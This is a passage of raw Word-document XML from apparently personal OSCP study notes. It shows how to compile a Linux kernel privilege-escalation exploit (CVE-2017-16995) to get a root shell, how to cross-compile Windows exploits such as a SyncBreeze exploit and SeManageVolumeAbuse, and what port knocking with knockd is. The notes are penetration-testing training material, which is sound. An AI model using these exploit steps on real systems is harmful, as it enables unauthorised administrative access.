          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc cve-2017-16995.c -o cve-2017-16995</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can safely assume gcc compiled it correctly since it did not output any errors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility, we can also inspect the Linux ELF file architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="126" name="image122.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image122.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115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368E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With all the prerequisites in place we are now ready to run our Linux kernel privilege escalation exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000368F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003690">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4014788" cy="2676525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1155"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="401478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3691">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003692">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We managed to obtain a root shell by exploiting a known kernel vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003693">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we learned how to manually enumerate our target for any known kernel vulnerabilities. We then discovered how to feed searchsploit our information to select the right exploit source code. Finally, we compiled the exploit and ran it against the target machine to gain an administrative shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003694">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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696">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1anqwl6hb6uy" w:id="489"/>
      <w:bookmarkEnd w:id="489"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Compiling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003697">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003698">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 13.1.3. Cross-Compiling Exploit Code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e5evh5g7emma" w:id="490"/>
      <w:bookmarkEnd w:id="490"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.c to .exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install mingw-w64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x86_64-w64-mingw32-gcc adduser.c -o adduser.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of a cross-compiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">compiles the C source code </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adduser.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a Windows executable binary called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adduser.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using the MinGW (Minimalist GNU for Windows) cross-compiler on a Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the 17.2.1 Video from OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Handling errors:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5626100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="344" name="image343.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image343.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1156"/>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36A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP 13.1.3. Cross-Compiling Exploit Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tnkhvy6bhhbu" w:id="491"/>
      <w:bookmarkEnd w:id="491"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.cpp to .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.cpp is for C++ (the "p" stands for plus)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install mingw-w64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x86_64-w64-mingw32-g++ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeManageVolumeAbuse.cpp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeManageVolumeAbuse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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6B0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_odd9gwuvwcr3" w:id="492"/>
      <w:bookmarkEnd w:id="492"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">knockd (port knocking)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1157">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knocked is a tool sometimes downloaded on Linux Machines. It is a port knocking server (daemon). If downloaded, you should be able to access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Knocking Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port knocking is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">network access control method</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to hide a service (like SSH) behind a closed port, making it appear invisible to port scans or attackers — until a special sequence of connection attempts (the "knock") is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Often, a "close sequence" (like 9842, 8475, 7469) is also set up to lock the port back when done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
